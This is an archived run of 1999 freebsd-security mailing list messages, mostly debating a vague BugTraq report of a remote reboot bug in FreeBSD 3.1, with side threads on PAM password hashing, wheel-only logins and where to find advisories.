1999 19:40:59 -0400 (EDT) X-Face: *0^4Iw) To: Seth Subject: RE: FreeBSD 3.1 remote reboot exploit (fwd) Cc: freebsd-stable@freebsd.org, security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 03-May-99 Seth wrote: > Just hit bugtraq, figured people might want to get in touch or start > digging. It's typically in bad taste to post it to BugTraq before contacting the vendor. Vince. -- ========================================================================== Vince Vielhaber -- KA8CSH email: vev@michvhf.com flame-mail: /dev/null # include TEAM-OS2 Online Campground Directory http://www.camping-usa.com Online Giftshop Superstore http://www.cloudninegifts.com ========================================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:44:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 9341E14CCA; Mon, 3 May 1999 16:44:21 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id TAA19863; Mon, 3 May 1999 19:44:19 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma019795; Mon, 3 May 99 19:43:18 -0400 Date: Mon, 03 May 1999 19:43:15 -0400 (EDT) From: Seth Subject: RE: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: To: Vince Vielhaber Cc: freebsd-stable@freebsd.org, security@freebsd.org Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I didn't post it. I didn't see it hit the lists, so I relayed it. Don't shoot the messenger! :) SB On Mon, 3 May 1999, Vince Vielhaber wrote: > > On 03-May-99 Seth wrote: > > Just hit bugtraq, figured people might want to get in touch or start > > digging. > > It's typically in bad taste to post it to BugTraq before contacting the > vendor. > > Vince. > -- > ========================================================================== > Vince Vielhaber -- KA8CSH email: vev@michvhf.com flame-mail: /dev/null > # include TEAM-OS2 > Online Campground Directory http://www.camping-usa.com > Online Giftshop Superstore http://www.cloudninegifts.com > ========================================================================== > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:51:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from paprika.michvhf.com (paprika.michvhf.com [209.57.60.12]) by hub.freebsd.org (Postfix) with SMTP id 2F29415500 for ; Mon, 3 May 1999 16:51:21 -0700 (PDT) (envelope-from vev@michvhf.com) Received: (qmail 11404 invoked by uid 1001); 3 May 1999 23:51:23 -0000 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Mon, 03 May 1999 19:51:23 -0400 (EDT) X-Face: *0^4Iw) To: Seth Subject: RE: FreeBSD 3.1 remote reboot exploit (fwd) Cc: freebsd-stable@freebsd.org, security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 03-May-99 Seth wrote: > I didn't post it. I didn't see it hit the lists, so I relayed it. Don't > shoot the messenger! :) Sorry, I read your comment as you telling him to "Just hit bugtraq" with it and someone there will find it real quick. Vince. > > SB > > On Mon, 3 May 1999, Vince Vielhaber wrote: > >> >> On 03-May-99 Seth wrote: >> > Just hit bugtraq, figured people might want to get in touch or start >> > digging. >> >> It's typically in bad taste to post it to BugTraq before contacting the >> vendor. >> -- ========================================================================== Vince Vielhaber -- KA8CSH email: vev@michvhf.com flame-mail: /dev/null # include TEAM-OS2 Online Campground Directory http://www.camping-usa.com Online Giftshop Superstore http://www.cloudninegifts.com ========================================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 17:42:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 08A15156D2 for ; Mon, 3 May 1999 17:42:26 -0700 (PDT) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id TAA06521; Mon, 3 May 1999 19:38:37 -0500 (CDT) Date: Mon, 3 May 1999 19:38:37 -0500 From: "Matthew D. Fuller" To: "Jordan K. Hubbard" Cc: "Jeroen C. van Gelderen" , Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990503193836.D1229@netalpha.net> References: <372C19F5.625BB2B@vangelderen.org> <23332.925637575@zippy.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <23332.925637575@zippy.cdrom.com>; from Jordan K. Hubbard on Sun, May 02, 1999 at 02:32:55AM -0700 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 02:32:55AM -0700, a little birdie told me that Jordan K. Hubbard remarked > > Erm, one of the goals of PAM is to support *multiple* encryption > methods, so why not do a PAM module for each and let the administrator > decide which authentication methods to support in /etc/pam.conf? So how far are we from being able to say 'Accept DES, prefer MD5, and always use MD5 for new passwords' with PAM? What pieces are we missing? -- *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* | Matthew Fuller MF4839 http://www.over-yonder.net/ | * fullermd@futuresouth.com fullermd@over-yonder.net * | UNIX Systems Administrator Specializing in FreeBSD | * FutureSouth Communications ISPHelp ISP Consulting * | "The only reason I'm burning my candle at both ends, | * is because I haven't figured out how to light the * | middle yet" | *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 17:48:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 712AC157AC for ; Mon, 3 May 1999 17:48:18 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id RAA30467; Mon, 3 May 1999 17:42:58 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: "Matthew D. Fuller" Cc: "Jeroen C. van Gelderen" , Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Mon, 03 May 1999 19:38:37 CDT." <19990503193836.D1229@netalpha.net> Date: Mon, 03 May 1999 17:42:58 -0700 Message-ID: <30464.925778578@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > So how far are we from being able to say 'Accept DES, prefer MD5, and > always use MD5 for new passwords' with PAM? What pieces are we missing? We can do that right now, though PAM doesn't "prefer" so much as simply try things in the order you specify. Humans prefer things, programs just do them. :-) The "new password" selection is handled by /etc/auth.conf - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 18:10:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from etosha (unknown [200.236.148.193]) by hub.freebsd.org (Postfix) with SMTP id F2B0D1520C for ; Mon, 3 May 1999 18:10:24 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: (qmail 373 invoked from network); 4 May 1999 01:10:41 -0000 Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 4 May 1999 01:10:41 -0000 Message-ID: <372E4911.3A384379@tdnet.com.br> Date: Mon, 03 May 1999 22:10:41 -0300 From: Gustavo V G C Rios X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: security@freebsd.org Subject: Security advisories Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Where can i get Security advisories for FreeBSD 2.2.8-Stable ? http://www.freebsd.org/security/#adv is too old! The last one is 08/98, FreeBSD is a very secure OS, or nobody knows it's bugs, what's the truth ? How can i keep myself up to date with security under FreeBSD ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 18:34: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from kizmiaz.dis.org (kizmiaz.dis.org [209.157.93.60]) by hub.freebsd.org (Postfix) with ESMTP id 174CF14EA4 for ; Mon, 3 May 1999 18:34:02 -0700 (PDT) (envelope-from daver@kizmiaz.dis.org) Received: (from daver@localhost) by kizmiaz.dis.org (8.9.2.Beta4/8.9.3) id SAA04318 for freebsd-security@freebsd.org; Mon, 3 May 1999 18:34:02 -0700 (PDT) Date: Mon, 3 May 1999 18:34:02 -0700 (PDT) From: Evil Dave Message-Id: <199905040134.SAA04318@kizmiaz.dis.org> To: freebsd-security@freebsd.org Subject: pam opie module Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org folks, someone requested this and i promptly lost the email. so, i'm going to put it up for anonymous ftp on flag.blackened.net in /pub/opie/ -rw-r--r-- 1 1000 1000 6410 May 4 01:30 opie.shar enjoy dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 18:41:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (Postfix) with ESMTP id 3AB4E14E7B; Mon, 3 May 1999 18:41:35 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.3/8.8.8) with ESMTP id SAA01305; Mon, 3 May 1999 18:40:30 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199905040140.SAA01305@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Seth Cc: freebsd-stable@freebsd.org, security@freebsd.org, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Mon, 03 May 1999 19:32:11 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 03 May 1999 18:40:30 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have to say that Jamie really let us down by not running a raw tcpdump alongside the second targetted machine here. Any chance of provoking these people into "demonstrating" the exploit on a machine, while another connected to the same wire is running tcpdump -s 2000 -w splot.raw and then sending us the 'splot.raw' file? > Just hit bugtraq, figured people might want to get in touch or start > digging. > > SB > > ---------- Forwarded message ---------- > Date: Sat, 01 May 1999 03:18:40 -0500 > From: Jamie Rishaw > To: BUGTRAQ@netspace.org > Subject: FreeBSD 3.1 remote reboot exploit > > Hi, > > Sorry to be so vague, but I wanted to let everyone know, > > It's been demonstrated to me by two people who will not reveal "how" > that there is a remote bug exploit, almost certainly over IP, that will > cause FreeBSD-3.1 systems to reboot with no warnings. > > The second box this was demonstrated on today had no open services > besides ircd, and was remote rebooted. (The first box had open services > such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd > as the culprit). > > If anyone can shed some light on this (really bad) issue, it'd be > greatly appreciated, especially since I am(was) in the process of > upgrading all of my boxes to 3.1. (3.1-REL). > > Regards, > > -jamie > -- > jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. > >Sr. Network Engr, Chicago, SoCal Data Centers > In an interesting move Exodus Communications annouced today that > they have replaced all of their backbone engineers with furby's > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 20:43:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id AE95A1579B; Mon, 3 May 1999 20:43:17 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA30990; Mon, 3 May 1999 20:42:48 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Mike Smith Cc: Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Mon, 03 May 1999 18:40:30 PDT." <199905040140.SAA01305@dingo.cdrom.com> Date: Mon, 03 May 1999 20:42:48 -0700 Message-ID: <30986.925789368@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I have to say that Jamie really let us down by not running a raw > tcpdump alongside the second targetted machine here. Any chance of > provoking these people into "demonstrating" the exploit on a machine, > while another connected to the same wire is running I'd say he or whomever first reported this to bugtraq let us down even more by releasing an "advisory" in such an unknown and unverifyable state. By doing so, all they've done is hand ammunition to the FUD corps and given us no reasonable chance to respond since the advisory is so content-free as to be completely worthless. Saying that "you saw something crash the box" is like telling the highway patrol that you "saw a stranded motorist somewhere between San Francisco and New York (and oh yeah, it was on a road!)" - what the hell are they supposed to do with a report like that? Auditing the entire operating system in search of such a reboot bug would be about as effective (and practical) as trying to search the entire U.S. highway system from coast to coast. If we want to actually achieve something with these little security alerts (other than to get people to stop reading them because they cry "Wolf!" all the time), we need to do a lot better than this. This didn't even meet the most minimal standards for competence I'd expect from someone in this industry. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 20:51: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail-gw1adm.rcsntx.swbell.net (mail-gw1.rcsntx.swbell.net [151.164.30.51]) by hub.freebsd.org (Postfix) with ESMTP id 4FE8F157B4; Mon, 3 May 1999 20:51:01 -0700 (PDT) (envelope-from chris@holly.dyndns.org) Received: from holly.dyndns.org (ppp-207-193-18-177.hstntx.swbell.net [207.193.18.177]) by mail-gw1adm.rcsntx.swbell.net (8.8.5/8.8.5) with ESMTP id WAA11371; Mon, 3 May 1999 22:50:38 -0500 (CDT) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id WAA11342; Mon, 3 May 1999 22:51:33 -0500 (CDT) (envelope-from chris) Date: Mon, 3 May 1999 22:51:32 -0500 From: Chris Costello To: "Jordan K. Hubbard" Cc: Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Message-ID: <19990503225131.I10291@holly.dyndns.org> Reply-To: chris@calldei.com References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: <30986.925789368@zippy.cdrom.com>; from Jordan K. Hubbard on Mon, May 03, 1999 at 08:42:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > I have to say that Jamie really let us down by not running a raw > > tcpdump alongside the second targetted machine here. Any chance of > > provoking these people into "demonstrating" the exploit on a machine, > > while another connected to the same wire is running > > I'd say he or whomever first reported this to bugtraq let us down even > more by releasing an "advisory" in such an unknown and unverifyable > state. By doing so, all they've done is hand ammunition to the FUD > corps and given us no reasonable chance to respond since the advisory I get the impression that that was the whole point of the bugtraq post, to give us more grief. [chop] > - Jordan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > -- Chris Costello E Pluribus UNIX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 21: 1:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [209.31.230.247]) by hub.freebsd.org (Postfix) with ESMTP id 66647157AC; Mon, 3 May 1999 21:01:21 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3/8.9.3) id VAA04638; Mon, 3 May 1999 21:11:06 -0700 (PDT) Date: Mon, 3 May 1999 21:11:05 -0700 From: Andre Gironda To: security@FreeBSD.ORG Cc: "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)eth@freebie.dp.ny.frb.org>, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, Message-ID: <19990503211105.F4424@toaster.sun4c.net> References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <30986.925789368@zippy.cdrom.com>; from Jordan K. Hubbard on Mon, May 03, 1999 at 08:42:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 03, 1999 at 08:42:48PM -0700, Jordan K. Hubbard wrote: > "Wolf!" all the time), we need to do a lot better than this. This > didn't even meet the most minimal standards for competence I'd expect > from someone in this industry. > > - Jordan What do you expect? This report came from someone at Exodus Communications. 'Nuff said. -dre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 21:18:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from Genesis.Denninger.Net (kdhome-2.pr.mcs.net [205.164.6.10]) by hub.freebsd.org (Postfix) with ESMTP id C6E2B14CCD; Mon, 3 May 1999 21:18:33 -0700 (PDT) (envelope-from karl@Genesis.Denninger.Net) Received: (from karl@localhost) by Genesis.Denninger.Net (8.9.3/8.8.2) id XAA11589; Mon, 3 May 1999 23:18:13 -0500 (CDT) Message-ID: <19990503231813.A11570@Denninger.Net> Date: Mon, 3 May 1999 23:18:13 -0500 From: Karl Denninger To: chris@calldei.com, "Jordan K. Hubbard" Cc: Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> <19990503225131.I10291@holly.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990503225131.I10291@holly.dyndns.org>; from Chris Costello on Mon, May 03, 1999 at 10:51:32PM -0500 Organization: Karl's Sushi and Packet Smashers X-Die-Spammers: Spammers will be LARTed and the remains fed to my cat Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: > On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > I have to say that Jamie really let us down by not running a raw > > > tcpdump alongside the second targetted machine here. Any chance of > > > provoking these people into "demonstrating" the exploit on a machine, > > > while another connected to the same wire is running > > > > I'd say he or whomever first reported this to bugtraq let us down even > > more by releasing an "advisory" in such an unknown and unverifyable > > state. By doing so, all they've done is hand ammunition to the FUD > > corps and given us no reasonable chance to respond since the advisory > > I get the impression that that was the whole point of the > bugtraq post, to give us more grief. Ding! Give that man a cigar. Anyone who saw this done to one machine and didn't *immediately* configure machine #2 to trap and trace on the second instance deserves raspberries - at a minimum. Its one thing to have it done "anyonmously" (among other things you might not be there when it goes "boom" under those conditions!) Its another to have it done under controlled conditions and neither get an explanantion OR trap the condition that caused it yourself with a tcpdump trace. -- -- Karl Denninger (karl@denninger.net) Web: fathers.denninger.net I ain't even *authorized* to speak for anyone other than myself, so give up now on trying to associate my words with any particular organization. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 22:40:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from warped.cswnet.com (warped.cswnet.com [209.136.201.6]) by hub.freebsd.org (Postfix) with SMTP id 0377414F22 for ; Mon, 3 May 1999 22:40:35 -0700 (PDT) (envelope-from lambert@warped.cswnet.com) Received: from gronk.csw.net ( [209.136.201.13] ) by warped.cswnet.com (Hethmon Brothers Smtpd) ; Mon, 3 May 1999 23:41:25 -0600 Message-Id: <199905032341.2518302.6@warped.cswnet.com> From: lambert@warped.cswnet.com Date: Tue, 04 May 1999 00:35:57 -0500 To: freebsd-security@freebsd.org Subject: Disallowing login to all but wheel members? X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.60 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I gather that one can supply the correct parameters to login.conf and disallow logins to anyone except wheel members. I have an old server up running 2.1.6 that is doing this with login.access. Things have changed. :-) The replacement is going to be a recent -STABLE. The docs aren't making complete sence to me yet. (I lack experience with the terminology.) Could somebody slip me a hint or even a brief example? Thanks, Scott Lambert lambert@cswnet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 2: 9: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id 4E410156D4; Tue, 4 May 1999 02:08:56 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id KAA12791; Tue, 4 May 1999 10:09:01 +0100 (BST) Message-ID: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: Cc: Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Date: Sat, 8 May 1999 10:08:45 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This sounds so.. so very familiar!! I have been the target of exploits before...... The exact same thing I have been experiencing........but not for about 5 days now! I'm not convinced its a pure exploit.. (i.e. a program specifically written for the purpose) Greg -----Original Message----- From: Karl Denninger To: chris@calldei.com ; Jordan K. Hubbard Cc: Mike Smith ; Seth ; freebsd-stable@FreeBSD.ORG ; security@FreeBSD.ORG ; jamie@exodus.net Date: 04 May 1999 05:20 Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) >On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: >> On Mon, May 3, 1999, Jordan K. Hubbard wrote: >> > > I have to say that Jamie really let us down by not running a raw >> > > tcpdump alongside the second targetted machine here. Any chance of >> > > provoking these people into "demonstrating" the exploit on a machine, >> > > while another connected to the same wire is running >> > >> > I'd say he or whomever first reported this to bugtraq let us down even >> > more by releasing an "advisory" in such an unknown and unverifyable >> > state. By doing so, all they've done is hand ammunition to the FUD >> > corps and given us no reasonable chance to respond since the advisory >> >> I get the impression that that was the whole point of the >> bugtraq post, to give us more grief. > >Ding! > >Give that man a cigar. > >Anyone who saw this done to one machine and didn't *immediately* configure >machine #2 to trap and trace on the second instance deserves raspberries - >at a minimum. > >Its one thing to have it done "anyonmously" (among other things you might >not be there when it goes "boom" under those conditions!) Its another to >have it done under controlled conditions and neither get an explanantion >OR trap the condition that caused it yourself with a tcpdump trace. > >-- >-- >Karl Denninger (karl@denninger.net) Web: fathers.denninger.net >I ain't even *authorized* to speak for anyone other than myself, so give >up now on trying to associate my words with any particular organization. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 2:47:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailgrd.orion.no (postkontor.orion.no [194.143.1.101]) by hub.freebsd.org (Postfix) with ESMTP id 002FD14E2C; Tue, 4 May 1999 02:47:32 -0700 (PDT) (envelope-from raymond@orion.no) Received: from postkontor.orion.no (unverified [62.92.20.132]) by mailgrd.orion.no (Integralis SMTPRS 2.04) with ESMTP id ; Tue, 04 May 1999 11:48:09 +0200 Received: from foobar.orion.no by postkontor.orion.no with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1460.8) id J865MT7L; Tue, 4 May 1999 11:47:43 +0200 X-Mailer: 21.2 "Clio" XEmacs Lucid (beta12) (via feedmail 8 I); VM 6.67 under 21.2 "Clio" XEmacs Lucid (beta12) From: "Raymond Wiker" MIME-Version: 1.0 Message-Id: <14126.49715.589157.172436@foobar.orion.no> Date: Tue, 4 May 1999 11:47:31 +0200 (CEST) To: , Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> References: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greg Quinlan writes: > This sounds so.. so very familiar!! > > I have been the target of exploits before...... > > The exact same thing I have been experiencing........but not for about 5 > days now! > > I'm not convinced its a pure exploit.. (i.e. a program specifically written > for the purpose) My first post to freebsd-stable (and security) - and it's a me-too :-) I'm running 3.1-RELEASE on a 486 with 16 MB of RAM, and this machine has been falling over regularly. Up until now I have suspected the local electricity, but it had rebooted this morning, even though it's now on a UPS. I have two other machines running 3.1-RELEASE in a slightly less hostile environment (i.e, no direct connections outwards), and they have been much more stable. I cannot rule out a hardware problem on the 486; I'll know for sure as soon as I upgrade it. //Raymond. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 7:35: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from delenn.acm.rpi.edu (delenn.acm.rpi.edu [128.213.5.14]) by hub.freebsd.org (Postfix) with SMTP id CE04E154CC for ; Tue, 4 May 1999 07:34:51 -0700 (PDT) (envelope-from slk@acm.rpi.edu) Received: (qmail 27021 invoked by uid 1120); 4 May 1999 14:34:51 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 May 1999 14:34:51 -0000 Date: Tue, 4 May 1999 10:34:50 -0400 (EDT) From: Simon Karpen To: Raymond Wiker Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <14126.49715.589157.172436@foobar.orion.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 4 May 1999, Raymond Wiker wrote: > I have two other machines running 3.1-RELEASE in a slightly > less hostile environment (i.e, no direct connections outwards), and > they have been much more stable. I cannot rule out a hardware problem > on the 486; I'll know for sure as soon as I upgrade it. I have 3.1-STABLE in a fairly hostile network environment. I've found that the following will make the system unstable and reboot. If you avoid all of thses, it's solid as a rock. (otherwise you get the reboots) VESA support VM86 support OSS/Payware sound drivers With any of thses, the system will reboot anywhere from a few minutes to a day or two after being brought up, usually within a few hours. With all of these removed, it's stable. The system is a PII/266 192MB with SCSI disks on a Buslogic, a Tulip (de0) ethernet card, Matrox G200 video, and a Creative Vibra16Xv soundcard. --Simon -- Simon Karpen karpes@rpi.edu slk@acm.rpi.edu #include I don't speak for RPI in any way. "Those that give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." --Ben Franklin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 8:52:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 4D2FD14FBD for ; Tue, 4 May 1999 08:52:28 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id BAA29421 for freebsd-security@freebsd.org; Wed, 5 May 1999 01:26:39 +1000 (EST) From: Darren Reed Message-Id: <199905041526.BAA29421@cheops.anu.edu.au> Subject: freebsd mbuf crash To: freebsd-security@freebsd.org Date: Wed, 5 May 1999 01:26:38 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk 